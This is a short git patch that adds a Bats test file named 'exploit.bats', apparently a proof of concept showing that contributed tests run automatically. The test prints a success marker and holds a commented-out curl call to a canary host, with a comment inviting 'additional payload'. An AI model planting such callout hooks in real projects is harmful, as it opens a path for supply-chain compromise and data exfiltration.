From 1171de391b760811bf190195d4f988de42f336ef Mon Sep 17 00:00:00 2001 From: sanling1 <504767574@qq.com> Date: Mon, 20 Apr 2026 10:16:03 +0800 Subject: [PATCH] Add exploit bats test --- tests/exploit.bats | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 tests/exploit.bats diff --git a/tests/exploit.bats b/tests/exploit.bats new file mode 100644 index 0000000..7582848 --- /dev/null +++ b/tests/exploit.bats @@ -0,0 +1,7 @@ +#!/usr/bin/env bats + +@test "exploit test" { + echo "EXPLOIT-SUCCESS-123" + # Additional payload could go here + # curl -s http://canary.domain/$(date +%s) || true +} \ No newline at end of file